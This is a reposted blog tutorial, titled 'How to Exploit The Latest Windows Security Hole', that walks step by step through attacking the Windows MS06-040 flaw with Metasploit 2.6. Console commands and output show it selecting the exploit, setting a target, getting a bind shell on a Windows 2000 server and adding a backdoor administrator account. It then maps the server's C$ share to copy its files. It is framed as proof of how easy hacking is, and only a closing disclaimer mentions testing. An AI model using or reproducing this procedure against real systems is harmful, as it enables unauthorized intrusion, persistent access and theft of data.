How to Exploit The Latest Windows Security Hole

How to Exploit MS06-040 [all credit goes to http://www.linickx.com] who wrote the whole guide!!
This is a repost of the full article for my readers:

[...]

[Do] you know actually how easy it is ?

Myth Number 1: You need to be Linux literate to hack. It is true that many hacking tools are built for *nix, and many will say they are the best (heck I’m using Linux now, so I’m not going to argue!) but many tools have been ported to windows (or Mac if you prefer), and if you think your average help-desk junkie is fairly windows literate, how difficult is it to point & click ? – are you concerned yet ?

Myth Number 2: Hacking is hard. Proper hacking – finding exploits in code yes, but what the public means as hacking, like copying files off your PC, no. I’m going to show you how to use a windows PC to Hack a vulnerable server, create an administrator account which will allow you to copy the contents of the severs hard drive.

OK, so exploit in the wild means, a popular hacking website has published a working exploit, in the case of MS06-040 Milw0rm did, here. What made this exploit interesting is that it was published as part of the popular pen testing tool Metasploit, which yep you guessed it, runs on windows !

So to get started, download and install metasploit (I’ll be using Framework 2.6).

See my previous post “Hacking – MSO6-040 Metasploit Download!!“

Once that’s installed you’ll need to update it with the latest available exploits, so click start -> metasploit framework -> msfupdate , and watch it do it’s thing. (for Linux or mac people you need to run msfupdate -u.) During the update you’ll see that it downloads netapi_ms06_040.pm, in windows world you have to be quick, as the window closes when it’s finished updating, but linuxy’s will be able to see, this is the exploit as published on Milw0rm.

Intrigued? Follow the white rabbit—>

Now there is a web GUI to metasploit framework, but (i) I didn’t find it that easy to use & (ii) it’s quite difficult to write an article saying point & click , so to hack (and I use the term loosely) we’re going to use the console, which is a little like a router console, limited commands not as overwhelming as a full command shell/terminal. So windows users start -> metspolit framework -> msfconsole (mac & Linux, just type msfconsole), and you’ll get a black box that looks a little like this:

888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888

+ -- --=[ msfconsole v2.6 [153 exploits - 76 payloads]

msf >

So to get started, you can just type help to see a list of commands:

msf > help

Metasploit Framework Main Console Help
======================================

?            Show the main console help
        cd           Change working directory
        exit         Exit the console
        help         Show the main console help
        info         Display detailed exploit or payload information
        quit         Exit the console
        reload       Reload exploits and payloads
        save         Save configuration to disk
        setg         Set a global environment variable
        show         Show available exploits and payloads
        unsetg       Remove a global environment variable
        use          Select an exploit by name
        version      Show console version

show exploits will give a list of available exploits, and we want netapi_ms06_040, so type use netapi_ms06_040, notice how the prompt has changed :

msf> use netapi_ms06_040
msf netapi_ms06_040 >

Right the next thing you need is something to attack, now I’ve got a windows 2000 server sp4 waiting with an ip address of 192.168.10.121, so to tell metasploit what to attack, you need to set a remote host variable. For the unfamiliar a variable is a word that represents something (I’m not a programmer so sorry for the crap definition), so we’re gonna set the word RHOSTto 192.168.10.121:

msf netapi_ms06_040 >set RHOST 192.168.10.120
RHOST -> 192.168.10.120
msf netapi_ms06_040 >

The final thing to do is to set up a payload. A payload is what you want to happen after you’ve exploited, show payloads :

msf netapi_ms06_040 > show payloads

Metasploit Framework Usable Payloads
====================================

win32_adduser                  Windows Execute net user /ADD
  win32_bind                     Windows Bind Shell
  win32_bind_dllinject           Windows Bind DLL Inject
  win32_bind_meterpreter         Windows Bind Meterpreter DLL Inject
  win32_bind_stg                 Windows Staged Bind Shell
  win32_bind_stg_upexec          Windows Staged Bind Upload/Execute
  win32_bind_vncinject           Windows Bind VNC Server DLL Inject
  win32_downloadexec             Windows Executable Download and Execute
  win32_exec                     Windows Execute Command
  win32_reverse                  Windows Reverse Shell
  win32_reverse_dllinject        Windows Reverse DLL Inject
  win32_reverse_meterpreter      Windows Reverse Meterpreter DLL Inject
  win32_reverse_ord              Windows Staged Reverse Ordinal Shell
  win32_reverse_ord_vncinject    Windows Reverse Ordinal VNC Server Inject
  win32_reverse_stg              Windows Staged Reverse Shell
  win32_reverse_stg_upexec       Windows Staged Reverse Upload/Execute
  win32_reverse_vncinject        Windows Reverse VNC Server Inject

Gives a nice list of what’s available, anything from command shells to full vnc guis. I’m going to pick the simplest which is win32_bind, when successful, this will change our metasploit console into a command prompt (start -> run -cmd.exe) on the attacked machine, thus allowing us to run any commands we like !

msf netapi_ms06_040 >set PAYLOAD win32_bind
PAYLOAD -> win32_bind
 msf netapi_ms06_040(win32_bind) >

Before we go any further it’s best to check we’ve got everything; the show options command is massively useful because it show us what settings (or variables) we need before an exploit will work.

msf netapi_ms06_040(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit:    Name       Default           Description
  --------    -------    --------------    ---------------------------------------
  required    RHOST      192.168.10.121    The target address
  optional    SMBDOM                       The domain for specified SMB username
  optional    SMBUSER                      The SMB username to connect with
  optional    SMBPASS                      The password for specified SMB username

Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------
  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LPORT       4444       Listening port for bind shell

Target: (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

msf netapi_ms06_040(win32_bind) >

As you can see we set the required RHOST, the others are optional (so we’ll ignore them) and the other required have been sorted for us

So the final touch is to hack ! Type exploit

msf netapi_ms06_040(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target
[*] Sending request...
[*] Got connection from 192.168.10.119:45064 <-> 192.168.10.121:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:WINNTsystem32>

Success ! (pat your self on the back!) you now have a working command line, now if you’re not that literate with windows command line you may think, so what !?!?! Well take a look at the following, we’ll set up a user called h4×0r, with password P455w0rd, and add him/her to the administrators group:

C:WINNTsystem32>net user h4x0r P455w0rd /add
net user h4x0r P455w0rd /add
The command completed successfully.

C:WINNTsystem32>net localgroup administrators h4x0r /add
net localgroup administrators h4x0r /add
The command completed successfully.

C:WINNTsystem32>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
h4x0r
The command completed successfully.

C:WINNTsystem32>

Now we have an administrator on that machine we can pretty much do what we like, so you windows users can mount the “C” drive as a remote hard drive and copy & read any file you like. So from your pc where metasploit is installed click start -> run , type cmd.exe; notice how the shell looks the same as the metasploit one ? and type

net use x: 192.168.10.121c$ P455w0rd /user:h4x0r

Finally windows people, under the “My Computer” of your machine you have an “X” drive of the server you attacked ! (Linux users you’ll have to use Samba to do the same, sorry Mac’ers I don’t know for you!)

Many Many Thanks to www.linickx.com for such a beautifully written and easy to follow “How To” on the latest MS security threat. Keep this knowledge free and we might just one day have a secure Windows OS. I’m just kidding, that’ll never happen. However, people will start regularly running windows update.

*Disclaimer/Warning – This post is for people to study the possible vulnerabilities of the Windows OS. It is NOT intended to act as a guideline for those that would use these security testing tools maliciously. WARNING: DO NOT UTILIZE THIS EXPLOIT FOR ANY OTHER REASON THAN TO TEST OS SECURITY IN A COMPLETE STAND ALONE ENVIRONMENT, I WILL NOT BE HELD RESPONSIBLE FOR THE ACTIONS OF THOSE THAT USE THIS INFORMATION TO BREAK THE LAW.